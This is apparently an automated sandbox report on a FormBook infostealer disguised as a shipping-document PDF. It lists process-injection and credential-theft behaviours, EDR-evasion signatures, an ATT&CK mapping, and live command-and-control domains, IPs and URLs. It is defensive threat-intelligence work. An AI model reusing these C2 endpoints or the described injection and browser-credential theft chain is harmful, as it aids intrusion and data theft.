            Source: C:\Windows\SysWOW64\rasdial.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\rasdial.exeThread register set: target process: 6848Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\rasdial.exeThread APC queued: target process: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\z4Shipping_document_pdf.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2846008Jump to behavior
            Source: C:\Users\user\Desktop\z4Shipping_document_pdf.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\z4Shipping_document_pdf.exe"Jump to behavior
            Source: C:\Program Files (x86)\ptFXyHEtSdFbvUvXCMprFdPALiMwCHgsJCUhkfaILEsCTLYXRQUzlrqMO\fWXPcgRbOhi.exeProcess created: C:\Windows\SysWOW64\rasdial.exe "C:\Windows\SysWOW64\rasdial.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: fWXPcgRbOhi.exe, 00000004.00000000.2447293545.0000000001961000.00000002.00000001.00040000.00000000.sdmp, fWXPcgRbOhi.exe, 00000004.00000002.4551063276.0000000001961000.00000002.00000001.00040000.00000000.sdmp, fWXPcgRbOhi.exe, 00000007.00000002.4551062041.00000000010F1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
            Source: fWXPcgRbOhi.exe, 00000004.00000000.2447293545.0000000001961000.00000002.00000001.00040000.00000000.sdmp, fWXPcgRbOhi.exe, 00000004.00000002.4551063276.0000000001961000.00000002.00000001.00040000.00000000.sdmp, fWXPcgRbOhi.exe, 00000007.00000002.4551062041.00000000010F1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: fWXPcgRbOhi.exe, 00000004.00000000.2447293545.0000000001961000.00000002.00000001.00040000.00000000.sdmp, fWXPcgRbOhi.exe, 00000004.00000002.4551063276.0000000001961000.00000002.00000001.00040000.00000000.sdmp, fWXPcgRbOhi.exe, 00000007.00000002.4551062041.00000000010F1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: z4Shipping_document_pdf.exeBinary or memory string: @3PDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
            Source: fWXPcgRbOhi.exe, 00000004.00000000.2447293545.0000000001961000.00000002.00000001.00040000.00000000.sdmp, fWXPcgRbOhi.exe, 00000004.00000002.4551063276.0000000001961000.00000002.00000001.00040000.00000000.sdmp, fWXPcgRbOhi.exe, 00000007.00000002.4551062041.00000000010F1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.4553080384.0000000004E90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4550544505.0000000002A80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2533356134.00000000031A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2533799840.0000000004400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2533023010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4550198146.0000000002800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4551356910.00000000044E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4551198252.00000000038A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\rasdial.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\rasdial.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\rasdial.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.4553080384.0000000004E90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4550544505.0000000002A80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2533356134.00000000031A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2533799840.0000000004400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2533023010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4550198146.0000000002800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4551356910.00000000044E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4551198252.00000000038A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
            DLL Side-Loading            		412
            Process Injection            		2
            Virtualization/Sandbox Evasion            		1
            OS Credential Dumping            		121
            Security Software Discovery            		Remote Services1
            Email Collection            		1
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            Abuse Elevation Control Mechanism            		412
            Process Injection            		LSASS Memory2
            Virtualization/Sandbox Evasion            		Remote Desktop Protocol1
            Archive Collected Data            		3
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Deobfuscate/Decode Files or Information            		Security Account Manager2
            Process Discovery            		SMB/Windows Admin Shares1
            Data from Local System            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Abuse Elevation Control Mechanism            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput Capture4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
            Obfuscated Files or Information            		LSA Secrets2
            File and Directory Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            DLL Side-Loading            		Cached Domain Credentials12
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1522882 Sample: z4Shipping_document_pdf.exe Startdate: 30/09/2024 Architecture: WINDOWS Score: 100 28 www.ngmr.xyz 2->28 30 www.huyven.xyz 2->30 32 19 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 Multi AV Scanner detection for submitted file 2->46 50 4 other signatures 2->50 10 z4Shipping_document_pdf.exe 1 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 30->48 process4 signatures5 62 Writes to foreign memory regions 10->62 64 Maps a DLL or memory area into another process 10->64 66 Switches to a custom stack to bypass stack traces 10->66 13 svchost.exe 10->13         started        process6 signatures7 68 Maps a DLL or memory area into another process 13->68 16 fWXPcgRbOhi.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 rasdial.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 fWXPcgRbOhi.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 patioprojex.africa 197.189.237.186, 49721, 49722, 49723 xneeloZA South Africa 22->34 36 zhs.zohosites.com 136.143.186.12, 49761, 49762, 49763 ZOHO-ASUS United States 22->36 38 12 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            z4Shipping_document_pdf.exe32%ReversingLabsWin32.Trojan.Autoitinject
            z4Shipping_document_pdf.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%URL Reputationsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.huyven.xyz
            		162.0.238.246
            		truetrue
              		unknown
              www.drivedoge.website
              		195.161.68.8
              		truetrue
                		unknown
                animekuid.xyz
                		203.175.9.128
                		truetrue
                  		unknown
                  www.dverkom.store
                  		31.31.196.17
                  		truetrue
                    		unknown
                    www.fieldelse.net
                    		18.141.10.107
                    		truetrue
                      		unknown
                      www.longfilsalphonse.net
                      		52.223.13.41
                      		truetrue
                        		unknown
                        www.ngmr.xyz
                        		54.67.87.110
                        		truetrue
                          		unknown
                          galaxyslot88rtp.lat
                          		46.17.172.49
                          		truetrue
                            		unknown
                            zhs.zohosites.com
                            		136.143.186.12
                            		truetrue
                              		unknown
                              dto20.shop
                              		3.33.130.190
                              		truetrue
                                		unknown
                                patioprojex.africa
                                		197.189.237.186
                                		truetrue
                                  		unknown
                                  wdeb18.top
                                  		206.119.82.147
                                  		truetrue
                                    		unknown
                                    h5hph710am.site
                                    		144.34.186.85
                                    		truetrue
                                      		unknown
                                      www.bayarcepat19.click
                                      		188.114.96.3
                                      		truetrue
                                        		unknown
                                        www.wdeb18.top
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.dto20.shop
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.h5hph710am.site
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.animekuid.xyz
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.lanxuanz.tech
                                                		unknown
                                                		unknowntrue
                                                  		unknown
                                                  www.galaxyslot88rtp.lat
                                                  		unknown
                                                  		unknowntrue
                                                    		unknown
                                                    www.patioprojex.africa
                                                    		unknown
                                                    		unknowntrue
                                                      		unknown

                                                      Contacted URLs

                                                      NameMaliciousAntivirus DetectionReputation
                                                      http://www.ngmr.xyz/fu87/?2Zv0=qtmpl4wh&FbuX5DnP=qh6vHM1wnebxXDDw2+FKNmF+EgGb6h3lhyJTJqyJk9tXxJTOz685U0RnFTuJgXE78BkDdexAIHcYDkJjTquRDOTOtPaRUKFiNfEDt1vQqQEhgT+IhmyUGPK3HCAi1oMdiQ==true
                                                        		unknown
                                                        http://www.huyven.xyz/dbbh/?FbuX5DnP=lamGMLAlOh98dBGrtynney6GPlHEM5QlQKbLlI7thJxhBrd30wtgMCvSkAg0SEbnfS5+p1L4UOQ6xDYv4dERCKoYatamVnzjD+qK6bhsesKkSZw/Bnu8WzfQ6tLw1Gl2PQ==&2Zv0=qtmpl4whtrue
                                                          		unknown
                                                          http://www.dverkom.store/fbcx/?FbuX5DnP=4VtioKF/mjPo/GpRkpc0Qv24mdyWT6seFEVk09A1HDpPAPyqNiGIX689XALIlCi8LzaCpYl7SzxyH3kwVthnk7FHu2LJAC1pbav8pNbFzRj12JkmuKEoiUFHOdUjAAbLgw==&2Zv0=qtmpl4whtrue
                                                            		unknown
                                                            http://www.galaxyslot88rtp.lat/sfat/true
                                                              		unknown
                                                              http://www.dto20.shop/zlyl/?FbuX5DnP=Ol7+XR9be+0p6ZvC9qKVEv0Hj0TGab+KR+2v1t8GCnFaAg3dec/002KiYj/aEuecGLCmVtqBzfUyHhXipe21UKmYS12AvSLU6uuH/hqX9wcAM20fmpYouhsYXjVvYDGKbw==&2Zv0=qtmpl4whtrue
                                                                		unknown
                                                                http://www.galaxyslot88rtp.lat/sfat/?2Zv0=qtmpl4wh&FbuX5DnP=ndQRUSq53iSLxvb8OFWfwTz47wZn0JkOZeX5JGA9kygqb7/vKRX/BZDIVWlzOZ6s0Fqu7sJ8lUpg5mYkJBBsoyg01CQ+qYMAZnZLVb86DHwbwWbBhRFgOPvzLtNlDmufAw==true
                                                                  		unknown
                                                                  http://www.dto20.shop/zlyl/true
                                                                    		unknown
                                                                    http://www.drivedoge.website/czka/?FbuX5DnP=ec+/5ooiqEi687og6mxZgK97hGtyT8hL+UNAVpoR3RpVRqn8W9A98dmq3fmGshL635UHDIR5u/r4iIgXkla3rsnbIqFgNahEcjh4DtJ4lSLz0jzSBM29wabUMiG34aKFBg==&2Zv0=qtmpl4whtrue
                                                                      		unknown
                                                                      http://www.longfilsalphonse.net/iq05/true
                                                                        		unknown
                                                                        http://www.wdeb18.top/jo6v/?FbuX5DnP=2MtP9xsvcXKXviIsu0vpU2PONZvfmv7hx3sLTV54B3JqqEM7biiUK4O8idRTqEg/3Cvc/KoIDU0zY+SEf5yzUNBsxxGwA99CFGRROpYSVV0FKk6l03kHnIpY1s/MIxOd0w==&2Zv0=qtmpl4whtrue
                                                                          		unknown
                                                                          http://www.patioprojex.africa/iv79/true
                                                                            		unknown
                                                                            http://www.drivedoge.website/czka/true
                                                                              		unknown
                                                                              http://www.wdeb18.top/jo6v/true
                                                                                		unknown
                                                                                http://www.patioprojex.africa/iv79/?FbuX5DnP=aYGuHzYMPqEvnYXTlDqrzWS6BBG+GAu386ntO+DgId2dpQiGgb80BmvDaKZWEoL5dVALkBoXEqYTfu76HBnrOhZ2SSaKAt1EqOH8KFdduTsKn1GCCc4Euldn4jk7wR0qhg==&2Zv0=qtmpl4whtrue
                                                                                  		unknown
                                                                                  http://www.animekuid.xyz/7u36/?2Zv0=qtmpl4wh&FbuX5DnP=RRg0VWAgukFyDCcWaOUK9J2JRQGKN1ekxOnlJwT3H1aqQkfKCZmBZ7MUA7JRhWgDz1/ahDOpP8lgsu8VajAwDFVi2x2f3RqmShFRGyru4wY6+58zPRZ+PwrE6jG4RlKX4A==true
                                                                                    		unknown
                                                                                    http://www.lanxuanz.tech/1q08/true
                                                                                      		unknown
                                                                                      http://www.fieldelse.net/exug/true
                                                                                        		unknown
                                                                                        http://www.huyven.xyz/dbbh/true
                                                                                          		unknown
                                                                                          http://www.h5hph710am.site/ni9w/?FbuX5DnP=8RaSk5tWi66Sq48MhHZUoNqLIlgjLo7w7AJBRYL2j4srPIRV3wjO+oo3VCeYgIIWRIVLwvpyy/VAIW0MNnFhP5IMZ0bC4qCM9jFMkTpJYlgGjxgR3domNTZU3RfMxSMm9A==&2Zv0=qtmpl4whtrue
                                                                                            		unknown
                                                                                            http://www.h5hph710am.site/ni9w/true
                                                                                              		unknown
                                                                                              http://www.animekuid.xyz/7u36/true
                                                                                                		unknown
                                                                                                http://www.bayarcepat19.click/g48c/true
                                                                                                  		unknown
                                                                                                  http://www.fieldelse.net/exug/?2Zv0=qtmpl4wh&FbuX5DnP=TUpMmFq2kwIXLFstS9tSAK6sg3+MTXwTelyO0iz++Kl2PamQN8cgWwJpHGB2BYM6TBg0ujJhQFrOEWIIA95gJhU2w3nrLf6Fr1xVloq0NNPRZ4qmm6KGpgvxijzqAjWBDA==true
                                                                                                    		unknown
                                                                                                    http://www.bayarcepat19.click/g48c/?2Zv0=qtmpl4wh&FbuX5DnP=u4dxImDz3hiCSE5hJ4yjIETlrN4hPhRObI6eehslCZThPKRDqwNE0F1xdz+i8CSvJHFK4MEqkJv66ZZdqE7/rLlhv1jvHawsWmzNBJFBDXYHMYLAOiBh9V/zUb3xtGimdQ==true
                                                                                                      		unknown
                                                                                                      http://www.dverkom.store/fbcx/true
                                                                                                        		unknown
                                                                                                        http://www.longfilsalphonse.net/iq05/?FbuX5DnP=HV/ljHR4CkTrXMhbIgqckwyB9eweuTfvL3Xi4RkMqp5guFUs7GFftA+08bhVXex6kzCAqTLzzcugxJOFA2/kc/VgdEUBB0GAlRBjnLrQuMLpABo8u25VHIvKEGEOSOD+9A==&2Zv0=qtmpl4whtrue
                                                                                                          		unknown

                                                                                                          URLs from Memory and Binaries

                                                                                                          NameSourceMaliciousAntivirus DetectionReputation
                                                                                                          https://duckduckgo.com/chrome_newtabrasdial.exe, 00000005.00000002.4553957937.00000000078BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          https://duckduckgo.com/ac/?q=rasdial.exe, 00000005.00000002.4553957937.00000000078BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          https://jino.rurasdial.exe, 00000005.00000002.4551985733.00000000052E6000.00000004.10000000.00040000.00000000.sdmp, fWXPcgRbOhi.exe, 00000007.00000002.4551359102.0000000002FD6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                            		unknown
                                                                                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=rasdial.exe, 00000005.00000002.4553957937.00000000078BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            		unknown
                                                                                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=rasdial.exe, 00000005.00000002.4553957937.00000000078BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            		unknown
                                                                                                            http://www.lanxuanz.techfWXPcgRbOhi.exe, 00000007.00000002.4553080384.0000000004F1B000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                                                              		unknown
                                                                                                              https://www.ecosia.org/newtab/rasdial.exe, 00000005.00000002.4553957937.00000000078BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              		unknown
                                                                                                              https://ac.ecosia.org/autocomplete?q=rasdial.exe, 00000005.00000002.4553957937.00000000078BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              		unknown
                                                                                                              http://animekuid.xyz/7u36/?2Zv0=qtmpl4wh&FbuX5DnP=RRg0VWAgukFyDCcWaOUK9J2JRQGKN1ekxOnlJwT3H1aqQkfKCZrasdial.exe, 00000005.00000002.4551985733.000000000579C000.00000004.10000000.00040000.00000000.sdmp, fWXPcgRbOhi.exe, 00000007.00000002.4551359102.000000000348C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                		unknown
                                                                                                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchrasdial.exe, 00000005.00000002.4553957937.00000000078BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=rasdial.exe, 00000005.00000002.4553957937.00000000078BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                • URL Reputation: safe
                                                                                                                		unknown
                                                                                                                https://www.bayarcepat19.click/g48c/?2Zv0=qtmpl4wh&FbuX5DnP=u4dxImDz3hiCSE5hJ4yjIETlrN4hPhRObI6eehslrasdial.exe, 00000005.00000002.4551985733.0000000005DE4000.00000004.10000000.00040000.00000000.sdmp, fWXPcgRbOhi.exe, 00000007.00000002.4551359102.0000000003AD4000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                  		unknown
                                                                                                                  http://patioprojex.africa/iv79/?FbuX5DnP=aYGuHzYMPqEvnYXTlDqrzWS6BBGrasdial.exe, 00000005.00000002.4551985733.000000000560A000.00000004.10000000.00040000.00000000.sdmp, fWXPcgRbOhi.exe, 00000007.00000002.4551359102.00000000032FA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                                    		unknown

                                                                                                                    World Map of Contacted IPs

                                                                                                                    • No. of IPs < 25%
                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                    • 75% < No. of IPs

                                                                                                                    Public IPs

                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                    162.0.238.246
                                                                                                                    		www.huyven.xyzCanada
                                                                                                                    		22612NAMECHEAP-NETUStrue
                                                                                                                    136.143.186.12
                                                                                                                    		zhs.zohosites.comUnited States
                                                                                                                    		2639ZOHO-ASUStrue
                                                                                                                    197.189.237.186
                                                                                                                    		patioprojex.africaSouth Africa
                                                                                                                    		37153xneeloZAtrue
                                                                                                                    206.119.82.147
                                                                                                                    		wdeb18.topUnited States
                                                                                                                    		174COGENT-174UStrue
                                                                                                                    203.175.9.128
                                                                                                                    		animekuid.xyzIndonesia
                                                                                                                    		131303FCCDCI-NET-PH4FPodiumRCBCPlazaTowerIPHtrue
                                                                                                                    31.31.196.17
                                                                                                                    		www.dverkom.storeRussian Federation
                                                                                                                    		197695AS-REGRUtrue
                                                                                                                    144.34.186.85
                                                                                                                    		h5hph710am.siteCanada
                                                                                                                    		25820IT7NETCAtrue
                                                                                                                    54.67.87.110
                                                                                                                    		www.ngmr.xyzUnited States
                                                                                                                    		16509AMAZON-02UStrue
                                                                                                                    188.114.96.3
                                                                                                                    		www.bayarcepat19.clickEuropean Union
                                                                                                                    		13335CLOUDFLARENETUStrue
                                                                                                                    52.223.13.41
                                                                                                                    		www.longfilsalphonse.netUnited States
                                                                                                                    		8987AMAZONEXPANSIONGBtrue
                                                                                                                    46.17.172.49
                                                                                                                    		galaxyslot88rtp.latGermany
                                                                                                                    		47583AS-HOSTINGERLTtrue
                                                                                                                    195.161.68.8
                                                                                                                    		www.drivedoge.websiteRussian Federation
                                                                                                                    		8342RTCOMM-ASRUtrue
                                                                                                                    18.141.10.107
                                                                                                                    		www.fieldelse.netUnited States
                                                                                                                    		16509AMAZON-02UStrue
                                                                                                                    3.33.130.190
                                                                                                                    		dto20.shopUnited States
                                                                                                                    		8987AMAZONEXPANSIONGBtrue

                                                                                                                    General Information

                                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                                    Analysis ID:1522882
                                                                                                                    Start date and time:2024-09-30 19:55:06 +02:00
                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                    Overall analysis duration:0h 9m 47s
                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                    Report type:full
                                                                                                                    Cookbook file name:default.jbs
                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                    Number of analysed new started processes analysed:7
                                                                                                                    Number of new started drivers analysed:0
                                                                                                                    Number of existing processes analysed:0
                                                                                                                    Number of existing drivers analysed:0
                                                                                                                    Number of injected processes analysed:2
                                                                                                                    Technologies:
                                                                                                                    • HCA enabled
                                                                                                                    • EGA enabled
                                                                                                                    • AMSI enabled
                                                                                                                    Analysis Mode:default
                                                                                                                    Analysis stop reason:Timeout
                                                                                                                    Sample name:z4Shipping_document_pdf.exe
                                                                                                                    Detection:MAL
                                                                                                                    Classification:mal100.troj.spyw.evad.winEXE@7/2@16/14
                                                                                                                    EGA Information:
                                                                                                                    • Successful, ratio: 75%
                                                                                                                    HCA Information:
                                                                                                                    • Successful, ratio: 95%
                                                                                                                    • Number of executed functions: 22
                                                                                                                    • Number of non-executed functions: 324
                                                                                                                    Cookbook Comments:
                                                                                                                    • Found application associated with file extension: .exe
                                                                                                                    • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                                    Warnings

                                                                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                    • Execution Graph export aborted for target fWXPcgRbOhi.exe, PID 4068 because it is empty
                                                                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                    • VT rate limit hit for: z4Shipping_document_pdf.exe

                                                                                                                    Simulations

                                                                                                                    Behavior and APIs

                                                                                                                    TimeTypeDescription
                                                                                                                    13:57:21API Interceptor9767692x Sleep call for process: rasdial.exe modified

                                                                                                                    Joe Sandbox View / Context

                                                                                                                    IPs

                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    162.0.238.246Purchase Order_ AEPL-2324-1126.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.mistsui.top/r48b/
                                                                                                                    RECIEPT.PDF.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.quantis.life/hczh/
                                                                                                                    LgzpILNkS2.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.inchey.online/ercr/
                                                                                                                    136.143.186.12NVOICE FOR THE MONTH OF AUG-24.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.lanxuanz.tech/ivo1/
                                                                                                                    DEBIT NOTE 01ST SEP 2024.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.lanxuanz.tech/ivo1/
                                                                                                                    PROFOMA INVOICE SHEET.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.lanxuanz.tech/ivo1/
                                                                                                                    x.exeGet hashmaliciousFormBookBrowse
